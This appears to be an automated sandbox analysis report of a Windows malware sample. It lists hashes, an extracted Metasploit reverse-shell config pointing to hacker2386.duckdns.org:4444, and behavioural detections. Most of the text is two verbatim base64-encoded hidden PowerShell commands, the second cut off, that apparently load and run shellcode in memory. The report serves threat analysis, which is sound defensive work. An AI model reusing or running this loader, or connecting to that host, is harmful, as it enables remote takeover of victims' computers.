Analysis
-
max time kernel
31s -
max time network
42s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
08-09-2024 05:16
Static task
static1
Behavioral task
behavioral1
Sample
d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
Resource
win10v2004-20240802-en
Errors
General
-
Target
d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
-
Size
318KB
-
MD5
d39fccd98f2225bba9db7ba4636ceef3
-
SHA1
a333cbb04d50cc455c2084933b21bbb2ef370a4f
-
SHA256
f2ca01177834859fa2f60bc1d060949ea88c15e38aa2de021f16dfdcea804724
-
SHA512
e8d8c36f30f0072db21ed2a7c1e3cc4c0301b83d8348d1f474fac9e2228a1666c548da2bca1c8d539dac0cfaf09422659df3a62cb9b2e02876794773b132b0f3
-
SSDEEP
6144:wtNb6TiU8liKNKCkC2Uus2czyD6FOWqxVyliAy7O6KLRvv7D:wtN+PznJTfc+mjpU/OtpD
Malware Config
Extracted
metasploit
encoder/shikata_ga_nai
Extracted
metasploit
windows/reverse_tcp_dns
hacker2386.duckdns.org:4444
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 15 1636 powershell.exe 15 1636 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3236 powershell.exe 2424 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2424 powershell.exe 2424 powershell.exe 3236 powershell.exe 3236 powershell.exe 1636 powershell.exe 1636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 1636 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 1484 wrote to memory of 2424 1484 d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe 83 PID 1484 wrote to memory of 2424 1484 d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe 83 PID 2424 wrote to memory of 3236 2424 powershell.exe 85 PID 2424 wrote to memory of 3236 2424 powershell.exe 85 PID 3236 wrote to memory of 1636 3236 powershell.exe 88 PID 3236 wrote to memory of 1636 3236 powershell.exe 88 PID 3236 wrote to memory of 1636 3236 powershell.exe 88 PID 1636 wrote to memory of 4628 1636 powershell.exe 90 PID 1636 wrote to memory of 4628 1636 powershell.exe 90 PID 1636 wrote to memory of 4628 1636 powershell.exe 90 PID 4628 wrote to memory of 4460 4628 csc.exe 91 PID 4628 wrote to memory of 4460 4628 csc.exe 91 PID 4628 wrote to memory of 4460 4628 csc.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JAB3AHkAegBWACAAPQAgACcAJABvAFMAUwBaACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AUwBTAFoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4ADUANwAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4AGYAYQAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABmACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABhADIALAAwAHgAZgBkACwAMAB4ADQAMQAsADAAeAA3ADgALAAwAHgANABjACwAMAB4AGYAZQAsADAAeAA5ADEALAAwAHgAMQBkACwAMAB4AGMANQAsADAAeAAxAGIALAAwAHgAYQAwACwAMAB4ADEAZAAsADAAeABiADEALAAwAHgANgA4ACwAMAB4ADkAMwAsADAAeABhAGQALAAwAHgAYgAyACwAMAB4ADMAZAAsADAAeAAxADgALAAwAHgANAA1ACwAMAB4ADkANgAsADAAeABkADUALAAwAHgAYQBiACwAMAB4ADIAYgAsADAAeAAzAGUALAAwAHgAZAA5ACwAMAB4ADEAYwAsADAAeAA4ADEALAAwAHgAMQA4ACwAMAB4AGQANAAsADAAeAA5AGQALAAwAHgAYgBhACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgAMQBlACwAMAB4AGMAMQAsADAAeAA4AGMALAAwAHgANQA3ACwAMAB4ADEAZgAsADAAeAAwAGEALAAwAHgAYwAxACwAMAB4ADkANgAsADAAeAA1ADgALAAwAHgANwA3ACwAMAB4ADIAYgAsADAAeABjAGEALAAwAHgAMwAxACwAMAB4AGYAMwAsADAAeAA5ADkALAAwAHgAZgBiACwAMAB4ADMANgAsADAAeAA0ADkALAAwAHgAMgAxACwAMAB4ADcANwAsADAAeAAwADQALAAwAHgANQBmACwAMAB4ADIAMQAsADAAeAA2ADQALAAwAHgAZABkACwAMAB4ADUAZQAsADAAeAAwADAALAAwAHgAMwBiACwAMAB4ADUANQAsADAAeAAzADkALAAwAHgAOAAyACwAMAB4AGIAZAAsADAAeABiAGEALAAwAHgAMwAxACwAMAB4ADgAYgAsADAAeABhADUALAAwAHgAZABmACwAMAB4ADcAYwAsADAAeAA0ADIALAAwAHgANQBkACwAMAB4ADIAYgAsADAAeAAwAGEALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAA2ADUALAAwAHgAZgAzACwAMAB4AGYAOQAsADAAeABmADYALAAwAHgANAA5ACwAMAB4ADAANgAsADAAeAAwADAALAAwAHgAMwBlACwAMAB4ADYAZAAsADAAeABmADkALAAwAHgANwA3ACwAMAB4ADMANgAsADAAeAA4AGQALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAA4AGQALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgAMQA2ACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAYgBjACwAMAB4AGYAMgAsADAAeAA2ADkALAAwAHgAZgA1ACwAMAB4ADUAYQAsADAAeAA3ADAALAAwAHgANgA1ACwAMAB4AGIAMgAsADAAeAAyADkALAAwAHgAZABlACwAMAB4ADYAYQAsADAAeAA0ADUALAAwAHgAZgBlACwAMAB4ADUANAAsADAAeAA5ADYALAAwAHgAYwBlACwAMAB4ADAAMQAsADAAeABiAGIALAAwAHgAMQBlACwAMAB4ADkANAAsADAAeAAyADUALAAwAHgAMQBmACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgANAA0ACwAMAB4ADAANgAsADAAeAAyADYALAAwAHgAMgAxACwAMAB4ADcAOQAsADAAeAA1ADgALAAwAHgAOAA5ACwAMAB4ADkAZQAsADAAeABkAGYALAAwAHgAMQAyACwAMAB4ADIANAAsADAAeABjAGEALAAwAHgANQAyACwAMAB4ADcAOQAsADAAeAAyADEALAAwAHgAMwBmACwAMAB4ADUAZQAsADAAeAA4ADIALAAwAHgAYgAxACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAZgAxACwAMAB4ADgAMwAsADAAeABmADgALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABhAGYALAAwAHgANwAxACwAMAB4ADQAZgAsADAAeAA1ADkALAAwAHgAYwBmACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgAZgA1ACwAMAB4ADIAZQAsADAAeAA1ADQALAAwAHgANAA3ACwAMAB4AGQAZgAsADAAeABmADQALAAwAHgAMAAwACwAMAB4ADEANwAsADAAeAA3ADcALAAwAHgAZABjACwAMAB4ADIAOAAsADAAeABmAGMALAAwAHgAOAA3ACwAMAB4AGUAMQAsADAAeABmAGMALAAwAHgANQAyACwAMAB4AGQAOAAsADAAeAA0AGQALAAwAHgAYQBmACwAMAB4ADEAMgAsADAAeAA4ADgALAAwAHgAMgBkACwAMAB4ADEAZgAsADAAeABmAGEALAAwAHgAYwAyACwAMAB4AGEAMQAsADAAeAA0ADAALAAwAHgAMQBhACwAMAB4AGUAZAAsADAAeAA2AGIALAAwAHgAZQA5ACwAMAB4ADMAMgAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4ADEANgAsADAAeABjADIALAAwAHgANAAyACwAMAB4AGYANQAsADAAeAA3ADUALAAwAHgAYQA5ACwAMAB4AGYANwAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADEAZQAsADAAeABjADAALAAwAHgANQAxACwAMAB4ADgAMgAsADAAeAAwADQALAAwAHgANAA1ACwAMAB4AGYAZAAsADAAeABiADEALAAwAHgAYQAwACwAMAB4AGMAYgAsADAAeAA3ADIALAAwAHgANgA4ACwAMAB4ADQANwAsADAAeAA2ADYALAAwAHgAMQAyACwAMAB4ADcANAAsADAAeABmAGYALAAwAHgAMgBmACwAMAB4AGYANAAsADAAeAA0ADAALAAwAHgANwBmACwAMAB4AGQAMAAsADAAeABkADAALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAAzADMALAAwAHgAYgAxACwAMAB4ADMAZQAsADAAeABlAGYALAAwAHgAMgAzACwAMAB4ADQANwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4AGUAOAAsADAAeABjAGUALAAwAHgAZAA5ACwAMAB4ADQAYQAsADAAeAAwADAALAAwAHgAOAA3ACwAMAB4ADcAMgAsADAAeABlADIALAAwAHgAYgA5ACwAMAB4ADgAMgAsADAAeAAwADkALAAwAHgAOQAzACwAMAB4ADQANgAsADAAeAAxADkALAAwAHgANwA0ACwAMAB4ADkAMwAsADAAeABjAGQALAAwAHgAYQBlACwAMAB4ADgAOAAsADAAeAA1AGQALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA5AGEALAAwAHgAMAA5ACwAMAB4AGMANgAsADAAeAA5ADEALAAwAHgAYwAxACwAMAB4ADkAZgAsADAAeABkADkALAAwAHgAMABmACwAMAB4ADYAZgAsADAAeAAxAGYALAAwAHgANABjACwAMAB4AGIANAAsADAAeAAyADYALAAwAHgANAA4ACwAMAB4AGYAOAAsADAAeABiADYALAAwAHgAMQBmACwAMAB4AGIAZQAsADAAeABhADcALAAwAHgANAA5ACwAMAB4ADQAYQAsADAAeABiADUALAAwAHgANgBlACwAMAB4AGQAYwAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAZQAsADAAeAAzADAALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeABkADkALAAwAHgANQBhACwAMAB4AGIANgAsADAAeAA1ADkALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeABlADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABlAGEALAAwAHgAOQA5ACwAMAB4ADIAZAAsADAAeAA1ADcALAAwAHgAMQA1ACwAMAB4AGMAOAAsADAAeAA4ADIALAAwAHgAZgAwACwAMAB4ADcAZAAsADAAeABmADYALAAwAHgAZgBkACwAMAB4ADMANwAsADAAeAAyADIALAAwAHgAMAA5ACwAMAB4ADIAOAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4AGQAYwAsADAAeAAxADQALAAwAHgAYgBjACwAMAB4ADQAZQAsADAAeABkAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADIASwBLAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAAyAEsASwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAMgBLAEsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB3AHkAegBWACkAKQA7ACQANwBxADEAWAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGIAWgBMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIAWgBMACAAJAA3AHEAMQBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADcAcQAxAFgAIAAkAGUAIgA7AH0A2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JAB3AHkAegBWACAAPQAgACcAJABvAFMAUwBaACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AUwBTAFoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4ADUANwAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4AGYAYQAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABmACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABhADIALAAwAHgAZgBkACwAMAB4ADQAMQAsADAAeAA3ADgALAAwAHgANABjACwAMAB4AGYAZQAsADAAeAA5ADEALAAwAHgAMQBkACwAMAB4AGMANQAsADAAeAAxAGIALAAwAHgAYQAwACwAMAB4ADEAZAAsADAAeABiADEALAAwAHgANgA4ACwAMAB4ADkAMwAsADAAeABhAGQALAAwAHgAYgAyACwAMAB4ADMAZAAsADAAeAAxADgALAAwAHgANAA1ACwAMAB4ADkANgAsADAAeABkADUALAAwAHgAYQBiACwAMAB4ADIAYgAsADAAeAAzAGUALAAwAHgAZAA5ACwAMAB4ADEAYwAsADAAeAA4ADEALAAwAHgAMQA4ACwAMAB4AGQANAAsADAAeAA5AGQALAAwAHgAYgBhACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgAMQBlACwAMAB4AGMAMQAsADAAeAA4AGMALAAwAHgANQA3ACwAMAB4ADEAZgAsADAAeAAwAGEALAAwAHgAYwAxACwAMAB4ADkANgAsADAAeAA1ADgALAAwAHgANwA3ACwAMAB4ADIAYgAsADAAeABjAGEALAAwAHgAMwAxACwAMAB4AGYAMwAsADAAeAA5ADkALAAwAHgAZgBiACwAMAB4ADMANgAsADAAeAA0ADkALAAwAHgAMgAxACwAMAB4ADcANwAsADAAeAAwADQALAAwAHgANQBmACwAMAB4ADIAMQAsADAAeAA2ADQALAAwAHgAZABkACwAMAB4ADUAZQAsADAAeAAwADAALAAwAHgAMwBiACwAMAB4ADUANQAsADAAeAAzADkALAAwAHgAOAAyACwAMAB4AGIAZAAsADAAeABiAGEALAAwAHgAMwAxACwAMAB4ADgAYgAsADAAeABhADUALAAwAHgAZABmACwAMAB4ADcAYwAsADAAeAA0ADIALAAwAHgANQBkACwAMAB4ADIAYgAsADAAeAAwAGEALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAA2ADUALAAwAHgAZgAzACwAMAB4AGYAOQAsADAAeABmADYALAAwAHgANAA5ACwAMAB4ADAANgAsADAAeAAwADAALAAwAHgAMwBlACwAMAB4ADYAZAAsADAAeABmADkALAAwAHgANwA3ACwAMAB4ADMANgAsADAAeAA4AGQALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAA4AGQALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgAMQA2ACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAYgBjACwAMAB4AGYAMgAsADAAeAA2ADkALAAwAHgAZgA1ACwAMAB4ADUAYQAsADAAeAA3ADAALAAwAHgANgA1ACwAMAB4AGIAMgAsADAAeAAyADkALAAwAHgAZABlACwAMAB4ADYAYQAsADAAeAA0ADUALAAwAHgAZgBlACwAMAB4ADUANAAsADAAeAA5ADYALAAwAHgAYwBlACwAMAB4ADAAMQAsADAAeABiAGIALAAwAHgAMQBlACwAMAB4ADkANAAsADAAeAAyADUALAAwAHgAMQBmACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgANAA0ACwAMAB4ADAANgAsADAAeAAyADYALAAwAHgAMgAxACwAMAB4ADcAOQAsADAAeAA1ADgALAAwAHgAOAA5ACwAMAB4ADkAZQAsADAAeABkAGYALAAwAHgAMQAyACwAMAB4ADIANAAsADAAeABjAGEALAAwAHgANQAyACwAMAB4ADcAOQAsADAAeAAyADEALAAwAHgAMwBmACwAMAB4ADUAZQAsADAAeAA4ADIALAAwAHgAYgAxACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAZgAxACwAMAB4ADgAMwAsADAAeABmADgALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABhAGYALAAwAHgANwAxACwAMAB4ADQAZgAsADAAeAA1ADkALAAwAHgAYwBmACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgAZgA1ACwAMAB4ADIAZQAsADAAeAA1ADQALAAwAHgANAA3ACwAMAB4AGQAZgAsADAAeABmADQALAAwAHgAMAAwACwAMAB4ADEANwAsADAAeAA3ADcALAAwAHgAZABjACwAMAB4ADIAOAAsADAAeABmAGMALAAwAHgAOAA3ACwAMAB4AGUAMQAsADAAeABmAGMALAAwAHgANQAyACwAMAB4AGQAOAAsADAAeAA0AGQALAAwAHgAYQBmACwAMAB4ADEAMgAsADAAeAA4ADgALAAwAHgAMgBkACwAMAB4ADEAZgAsADAAeABmAGEALAAwAHgAYwAyACwAMAB4AGEAMQAsADAAeAA0ADAALAAwAHgAMQBhACwAMAB4AGUAZAAsADAAeAA2AGIALAAwAHgAZQA5ACwAMAB4ADMAMgAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4ADEANgAsADAAeABjADIALAAwAHgANAAyACwAMAB4AGYANQAsADAAeAA3ADUALAAwAHgAYQA5ACwAMAB4AGYANwAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADEAZQAsADAAeABjADAALAAwAHgANQAxACwAMAB4ADgAMgAsADAAeAAwADQALAAwAHgANAA1ACwAMAB4AGYAZAAsADAAeABiADEALAAwAHgAYQAwACwAMAB4AGMAYgAsADAAeAA3ADIALAAwAHgANgA4ACwAMAB4ADQANwAsADAAeAA2ADYALAAwAHgAMQAyACwAMAB4ADcANAAsADAAeABmAGYALAAwAHgAMgBmACwAMAB4AGYANAAsADAAeAA0ADAALAAwAHgANwBmACwAMAB4AGQAMAAsADAAeABkADAALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAAzADMALAAwAHgAYgAxACwAMAB4ADMAZQAsADAAeABlAGYALAAwAHgAMgAzACwAMAB4ADQANwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4AGUAOAAsADAAeABjAGUALAAwAHgAZAA5ACwAMAB4ADQAYQAsADAAeAAwADAALAAwAHgAOAA3ACwAMAB4ADcAMgAsADAAeABlADIALAAwAHgAYgA5ACwAMAB4ADgAMgAsADAAeAAwADkALAAwAHgAOQAzACwAMAB4ADQANgAsADAAeAAxADkALAAwAHgANwA0ACwAMAB4ADkAMwAsADAAeABjAGQALAAwAHgAYQBlACwAMAB4ADgAOAAsADAAeAA1AGQALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA5AGEALAAwAHgAMAA5ACwAMAB4AGMANgAsADAAeAA5ADEALAAwAHgAYwAxACwAMAB4ADkAZgAsADAAeABkADkALAAwAHgAMABmACwAMAB4ADYAZgAsADAAeAAxAGYALAAwAHgANABjACwAMAB4AGIANAAsADAAeAAyADYALAAwAHgANAA4ACwAMAB4AGYAOAAsADAAeABiADYALAAwAHgAMQBmACwAMAB4AGIAZQAsADAAeABhADcALAAwAHgANAA5ACwAMAB4ADQAYQAsADAAeABiADUALAAwAHgANgBlACwAMAB4AGQAYwAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAZQAsADAAeAAzADAALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeABkADkALAAwAHgANQBhACwAMAB4AGIANgAsADAAeAA1ADkALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeABlADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABlAGEALAAwAHgAOQA5ACwAMAB4ADIAZAAsADAAeAA1ADcALAAwAHgAMQA1ACwAMAB4AGMAOAAsADAAeAA4ADIALAAwAHgAZgAwACwAMAB4ADcAZAAsADAAeABmADYALAAwAHgAZgBkACwAMAB4ADMANwAsADAAeAAyADIALAAwAHgAMAA5ACwAMAB4ADIAOAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4AGQAYwAsADAAeAAxADQALAAwAHgAYgBjACwAMAB4ADQAZQAsADAAeABkAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADIASwBLAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAAyAEsASwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQA